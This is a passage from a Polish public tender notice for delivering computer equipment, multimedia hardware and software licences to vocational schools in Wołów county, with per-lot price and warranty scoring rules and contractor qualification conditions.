zostanie poddany okres gwarancji wskazany przez Wykonawcę w formularzu oferty. <br/>Przyjmuje się, że punkty w tym kryterium będą przyznawane następująco: <br/>Zaoferowany okres gwarancji	Liczba punktów<br/>24 miesiące	0 pkt (0%)<br/>30 miesięcy	20 pkt (20%)<br/>36 miesięcy	40 pkt (40%)<br/>Przez „okres gwarancji” należy rozumieć oferowany przez Wykonawcę okres gwarancji jakości na przedmiot zamówienia (liczonych w miesiącach) , licząc od daty odbioru ostatecznego (końcowego). <br/>Minimalny, wymagany przez Zamawiającego okres gwarancji wynosi 24 miesiące. Oferty Wykonawców, którzy zaoferują okres gwarancji krótszy niż wskazany w SWZ przez Zamawiającego zostaną odrzucone jako niezgodne z zapisami SWZ. Jeżeli Wykonawca zaoferuje okres gwarancji inny niż 24, 30 lub 36 miesięcy, wówczas w celu przyznania punktacji w tym kryterium okres gwarancji zostanie zaokrąglony w dół do najbliższego okresu, natomiast zadeklarowany w ofercie Wykonawcy okres zostanie wpisany do umowy w sprawie zamówienia publicznego jako obowiązujący.<br/>Wykonawca udzieli minimum 24 miesięcy gwarancji, maksymalnie 36 miesięcy gwarancji na przedmiot zamówienia zgodnie umową, licząc od daty dokonania odbioru końcowego przedmiotu zamówienia przez Zamawiającego. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy, Zamawiający do oceny ofert przyjmie okres 36 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty okres gwarancji zgodnie ze złożoną ofertą.<br/>W przypadku, gdy Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny minimalny (wymagany) 24 miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Maksymalnie w kryterium okres gwarancji Zamawiający przyzna ofercie 40 punktów.<br/>ŁĄCZNA LICZBA PUNKTÓW = KRYTERIUM CENA + KRYTERIUM OKRES GWARANCJI. <br/>3.	Uzyskana liczba punktów w ramach danego kryterium zaokrąglana będzie do drugiego miejsca po przecinku. <br/>4.	Zamawiający za najkorzystniejszą uzna ofertę, która oraz uzyska największą łączną liczbę punktów przyznanych w ramach wszystkich ustalonych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego<br/>powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3” w ramach<br/>programu Fundusze Europejskie dla Dolnego Śląska 2021-2027. Szczegółowy opis przedmiotu zmówienia: został zawarty w<br/>opisie przedmiotu zamówienia – załącznik nr 1 do SWZ oraz w formularzu cenowym – załącznik nr 5.3 do SWZ. Część 3 -<br/>Część 3 - Licencje programów dla Zespołu Szkół Zawodowych w Brzegu Dolnym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48320000-7 - Pakiety oprogramowania do rysowania i odwzorowywania</p> <p class="mb-0">48328000-3 - Pakiety oprogramowania do przetwarzania obrazów</p> <p class="mb-0">48521000-6 - Pakiety oprogramowania muzycznego lub do edycji dźwięków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował poniższym kryterium oceny:<br/>l.p. Kryterium Opis Waga – udział w ocenie<br/>1 Cena Cena oferty (z podatkiem VAT) za realizację przedmiotu zamówienia, na którą powinny składać się wszelkie koszty<br/>ponoszone przez wykonawcę 60% = 60 pkt<br/>2 Gwarancja Okres gwarancji zaoferowany przez Wykonawcę na formularzu oferty. 40% = 40 pkt<br/>2. W kryterium ceny ocenie poddana zostanie cena oferty brutto obliczona przez wykonawcę zgodnie zobowiązującymi przepisami<br/>prawa, zasadami określonymi w Rozdziale 16 SWZ i podana w „Formularzu ofertowym” (wg. wzoru zał. nr 2 do SWZ) – CENA – 60%<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie wg następującej zasady:<br/>Liczba punktów = Cena brutto najniższej zaproponowanej oferty/ Cena brutto oferty badanej x 60<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>3. W kryterium gwarancja ocenie zostanie poddany okres gwarancji wskazany przez Wykonawcę w formularzu oferty. <br/>Przyjmuje się, że punkty w tym kryterium będą przyznawane następująco: <br/>Zaoferowany okres gwarancji	Liczba punktów<br/>24 miesiące	0 pkt (0%)<br/>30 miesięcy	20 pkt (20%)<br/>36 miesięcy	40 pkt (40%)<br/>Przez „okres gwarancji” należy rozumieć oferowany przez Wykonawcę okres gwarancji jakości na przedmiot zamówienia (liczonych w miesiącach) , licząc od daty odbioru ostatecznego (końcowego). <br/>Minimalny, wymagany przez Zamawiającego okres gwarancji wynosi 24 miesiące. Oferty Wykonawców, którzy zaoferują okres gwarancji krótszy niż wskazany w SWZ przez Zamawiającego zostaną odrzucone jako niezgodne z zapisami SWZ. Jeżeli Wykonawca zaoferuje okres gwarancji inny niż 24, 30 lub 36 miesięcy, wówczas w celu przyznania punktacji w tym kryterium okres gwarancji zostanie zaokrąglony w dół do najbliższego okresu, natomiast zadeklarowany w ofercie Wykonawcy okres zostanie wpisany do umowy w sprawie zamówienia publicznego jako obowiązujący.<br/>Wykonawca udzieli minimum 24 miesięcy gwarancji, maksymalnie 36 miesięcy gwarancji na przedmiot zamówienia zgodnie umową, licząc od daty dokonania odbioru końcowego przedmiotu zamówienia przez Zamawiającego. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy, Zamawiający do oceny ofert przyjmie okres 36 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty okres gwarancji zgodnie ze złożoną ofertą.<br/>W przypadku, gdy Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny minimalny (wymagany) 24 miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Maksymalnie w kryterium okres gwarancji Zamawiający przyzna ofercie 40 punktów.<br/>ŁĄCZNA LICZBA PUNKTÓW = KRYTERIUM CENA + KRYTERIUM OKRES GWARANCJI. <br/>3.	Uzyskana liczba punktów w ramach danego kryterium zaokrąglana będzie do drugiego miejsca po przecinku. <br/>4.	Zamawiający za najkorzystniejszą uzna ofertę, która oraz uzyska największą łączną liczbę punktów przyznanych w ramach wszystkich ustalonych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego<br/>powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3” w ramach<br/>programu Fundusze Europejskie dla Dolnego Śląska 2021-2027. Szczegółowy opis przedmiotu zmówienia: został zawarty w<br/>opisie przedmiotu zamówienia – załącznik nr 1 do SWZ oraz w formularzu cenowym – załącznik nr 5.4 do SWZ. Część 4 -<br/>Sprzęt multimedialny do pracowni mechatronicznej i ekonomiczno – logistycznej w Centrum Kształcenia Zawodowego i<br/>Ustawicznego w Wołowie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213300-8 - Komputer biurkowy</p> <p class="mb-0">33195100-4 - Monitory</p> <p class="mb-0">30121430-6 - Cyfrowe urządzenia powielające</p> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował poniższym kryterium oceny:<br/>l.p. Kryterium Opis Waga – udział w ocenie<br/>1 Cena Cena oferty (z podatkiem VAT) za realizację przedmiotu zamówienia, na którą powinny składać się wszelkie koszty<br/>ponoszone przez wykonawcę 60% = 60 pkt<br/>2 Gwarancja Okres gwarancji zaoferowany przez Wykonawcę na formularzu oferty. 40% = 40 pkt<br/>2. W kryterium ceny ocenie poddana zostanie cena oferty brutto obliczona przez wykonawcę zgodnie zobowiązującymi przepisami<br/>prawa, zasadami określonymi w Rozdziale 16 SWZ i podana w „Formularzu ofertowym” (wg. wzoru zał. nr 2 do SWZ) – CENA – 60%<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie wg następującej zasady:<br/>Liczba punktów = Cena brutto najniższej zaproponowanej oferty/ Cena brutto oferty badanej x 60<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>3. W kryterium gwarancja ocenie zostanie poddany okres gwarancji wskazany przez Wykonawcę w formularzu oferty. <br/>Przyjmuje się, że punkty w tym kryterium będą przyznawane następująco: <br/>Zaoferowany okres gwarancji	Liczba punktów<br/>24 miesiące	0 pkt (0%)<br/>30 miesięcy	20 pkt (20%)<br/>36 miesięcy	40 pkt (40%)<br/>Przez „okres gwarancji” należy rozumieć oferowany przez Wykonawcę okres gwarancji jakości na przedmiot zamówienia (liczonych w miesiącach) , licząc od daty odbioru ostatecznego (końcowego). <br/>Minimalny, wymagany przez Zamawiającego okres gwarancji wynosi 24 miesiące. Oferty Wykonawców, którzy zaoferują okres gwarancji krótszy niż wskazany w SWZ przez Zamawiającego zostaną odrzucone jako niezgodne z zapisami SWZ. Jeżeli Wykonawca zaoferuje okres gwarancji inny niż 24, 30 lub 36 miesięcy, wówczas w celu przyznania punktacji w tym kryterium okres gwarancji zostanie zaokrąglony w dół do najbliższego okresu, natomiast zadeklarowany w ofercie Wykonawcy okres zostanie wpisany do umowy w sprawie zamówienia publicznego jako obowiązujący.<br/>Wykonawca udzieli minimum 24 miesięcy gwarancji, maksymalnie 36 miesięcy gwarancji na przedmiot zamówienia zgodnie umową, licząc od daty dokonania odbioru końcowego przedmiotu zamówienia przez Zamawiającego. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy, Zamawiający do oceny ofert przyjmie okres 36 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty okres gwarancji zgodnie ze złożoną ofertą.<br/>W przypadku, gdy Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny minimalny (wymagany) 24 miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Maksymalnie w kryterium okres gwarancji Zamawiający przyzna ofercie 40 punktów.<br/>ŁĄCZNA LICZBA PUNKTÓW = KRYTERIUM CENA + KRYTERIUM OKRES GWARANCJI. <br/>3.	Uzyskana liczba punktów w ramach danego kryterium zaokrąglana będzie do drugiego miejsca po przecinku. <br/>4.	Zamawiający za najkorzystniejszą uzna ofertę, która oraz uzyska największą łączną liczbę punktów przyznanych w ramach wszystkich ustalonych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego<br/>powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3” w ramach<br/>programu Fundusze Europejskie dla Dolnego Śląska 2021-2027. Szczegółowy opis przedmiotu zmówienia: został zawarty w<br/>opisie przedmiotu zamówienia – załącznik nr 1 do SWZ oraz w formularzu cenowym – załącznik nr 5.5 do SWZ. Część 5 -<br/>Licencje programów dla Zespołu Szkół Zawodowych w Wołowie (geodezyjne). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48326000-9 - Pakiety oprogramowania do odwzorowywania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował poniższym kryterium oceny:<br/>l.p. Kryterium Opis Waga – udział w ocenie<br/>1 Cena Cena oferty (z podatkiem VAT) za realizację przedmiotu zamówienia, na którą powinny składać się wszelkie koszty<br/>ponoszone przez wykonawcę 60% = 60 pkt<br/>2 Gwarancja Okres gwarancji zaoferowany przez Wykonawcę na formularzu oferty. 40% = 40 pkt<br/>2. W kryterium ceny ocenie poddana zostanie cena oferty brutto obliczona przez wykonawcę zgodnie zobowiązującymi przepisami<br/>prawa, zasadami określonymi w Rozdziale 16 SWZ i podana w „Formularzu ofertowym” (wg. wzoru zał. nr 2 do SWZ) – CENA – 60%<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie wg następującej zasady:<br/>Liczba punktów = Cena brutto najniższej zaproponowanej oferty/ Cena brutto oferty badanej x 60<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>3. W kryterium gwarancja ocenie zostanie poddany okres gwarancji wskazany przez Wykonawcę w formularzu oferty. <br/>Przyjmuje się, że punkty w tym kryterium będą przyznawane następująco: <br/>Zaoferowany okres gwarancji	Liczba punktów<br/>24 miesiące	0 pkt (0%)<br/>30 miesięcy	20 pkt (20%)<br/>36 miesięcy	40 pkt (40%)<br/>Przez „okres gwarancji” należy rozumieć oferowany przez Wykonawcę okres gwarancji jakości na przedmiot zamówienia (liczonych w miesiącach) , licząc od daty odbioru ostatecznego (końcowego). <br/>Minimalny, wymagany przez Zamawiającego okres gwarancji wynosi 24 miesiące. Oferty Wykonawców, którzy zaoferują okres gwarancji krótszy niż wskazany w SWZ przez Zamawiającego zostaną odrzucone jako niezgodne z zapisami SWZ. Jeżeli Wykonawca zaoferuje okres gwarancji inny niż 24, 30 lub 36 miesięcy, wówczas w celu przyznania punktacji w tym kryterium okres gwarancji zostanie zaokrąglony w dół do najbliższego okresu, natomiast zadeklarowany w ofercie Wykonawcy okres zostanie wpisany do umowy w sprawie zamówienia publicznego jako obowiązujący.<br/>Wykonawca udzieli minimum 24 miesięcy gwarancji, maksymalnie 36 miesięcy gwarancji na przedmiot zamówienia zgodnie umową, licząc od daty dokonania odbioru końcowego przedmiotu zamówienia przez Zamawiającego. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy, Zamawiający do oceny ofert przyjmie okres 36 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty okres gwarancji zgodnie ze złożoną ofertą.<br/>W przypadku, gdy Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny minimalny (wymagany) 24 miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Maksymalnie w kryterium okres gwarancji Zamawiający przyzna ofercie 40 punktów.<br/>ŁĄCZNA LICZBA PUNKTÓW = KRYTERIUM CENA + KRYTERIUM OKRES GWARANCJI. <br/>3.	Uzyskana liczba punktów w ramach danego kryterium zaokrąglana będzie do drugiego miejsca po przecinku. <br/>4.	Zamawiający za najkorzystniejszą uzna ofertę, która oraz uzyska największą łączną liczbę punktów przyznanych w ramach wszystkich ustalonych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Dostawa sprzętu komputerowego i multimedialnego do szkół kształcenia zawodowego<br/>powiatu wołowskiego w ramach projektu pt. „Rozwój kształcenia zawodowego w Powiecie Wołowskim – edycja 3” w ramach<br/>programu Fundusze Europejskie dla Dolnego Śląska 2021-2027. Szczegółowy opis przedmiotu zmówienia: został zawarty w<br/>opisie przedmiotu zamówienia – załącznik nr 1 do SWZ oraz w formularzu cenowym – załącznik nr 5.6 do SWZ. Część 6 -<br/>Licencje programów dla Zespołu Szkół Zawodowych w Wołowie (dla gastronomii). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował poniższym kryterium oceny:<br/>l.p. Kryterium Opis Waga – udział w ocenie<br/>1 Cena Cena oferty (z podatkiem VAT) za realizację przedmiotu zamówienia, na którą powinny składać się wszelkie koszty<br/>ponoszone przez wykonawcę 60% = 60 pkt<br/>2 Gwarancja Okres gwarancji zaoferowany przez Wykonawcę na formularzu oferty. 40% = 40 pkt<br/>2. W kryterium ceny ocenie poddana zostanie cena oferty brutto obliczona przez wykonawcę zgodnie zobowiązującymi przepisami<br/>prawa, zasadami określonymi w Rozdziale 16 SWZ i podana w „Formularzu ofertowym” (wg. wzoru zał. nr 2 do SWZ) – CENA – 60%<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie wg następującej zasady:<br/>Liczba punktów = Cena brutto najniższej zaproponowanej oferty/ Cena brutto oferty badanej x 60<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>3. W kryterium gwarancja ocenie zostanie poddany okres gwarancji wskazany przez Wykonawcę w formularzu oferty. <br/>Przyjmuje się, że punkty w tym kryterium będą przyznawane następująco: <br/>Zaoferowany okres gwarancji	Liczba punktów<br/>24 miesiące	0 pkt (0%)<br/>30 miesięcy	20 pkt (20%)<br/>36 miesięcy	40 pkt (40%)<br/>Przez „okres gwarancji” należy rozumieć oferowany przez Wykonawcę okres gwarancji jakości na przedmiot zamówienia (liczonych w miesiącach) , licząc od daty odbioru ostatecznego (końcowego). <br/>Minimalny, wymagany przez Zamawiającego okres gwarancji wynosi 24 miesiące. Oferty Wykonawców, którzy zaoferują okres gwarancji krótszy niż wskazany w SWZ przez Zamawiającego zostaną odrzucone jako niezgodne z zapisami SWZ. Jeżeli Wykonawca zaoferuje okres gwarancji inny niż 24, 30 lub 36 miesięcy, wówczas w celu przyznania punktacji w tym kryterium okres gwarancji zostanie zaokrąglony w dół do najbliższego okresu, natomiast zadeklarowany w ofercie Wykonawcy okres zostanie wpisany do umowy w sprawie zamówienia publicznego jako obowiązujący.<br/>Wykonawca udzieli minimum 24 miesięcy gwarancji, maksymalnie 36 miesięcy gwarancji na przedmiot zamówienia zgodnie umową, licząc od daty dokonania odbioru końcowego przedmiotu zamówienia przez Zamawiającego. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy, Zamawiający do oceny ofert przyjmie okres 36 miesięcy, a w przypadku wyboru oferty Wykonawcy, do umowy zostanie przyjęty okres gwarancji zgodnie ze złożoną ofertą.<br/>W przypadku, gdy Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji, Zamawiający przyjmie do oceny minimalny (wymagany) 24 miesięczny okres gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Maksymalnie w kryterium okres gwarancji Zamawiający przyzna ofercie 40 punktów.<br/>ŁĄCZNA LICZBA PUNKTÓW = KRYTERIUM CENA + KRYTERIUM OKRES GWARANCJI. <br/>3.	Uzyskana liczba punktów w ramach danego kryterium zaokrąglana będzie do drugiego miejsca po przecinku. <br/>4.	Zamawiający za najkorzystniejszą uzna ofertę, która oraz uzyska największą łączną liczbę punktów przyznanych w ramach wszystkich ustalonych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale 6 SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3. Zamawiający, w stosunku do wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od wykonawcy złożenia wraz z ofertą:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, sporządzonych nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>2. Pełnomocnictwo (w przypadku składania oferty wspólnej lub gdy osoba upoważniona do reprezentowania Wykonawcy działa na podstawie pełnomocnictwa);<br/>3. Zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia – wzór zobowiązania stanowi załącznik nr 4 do SWZ (jeżeli dotyczy).<br/>4. Na ofertę 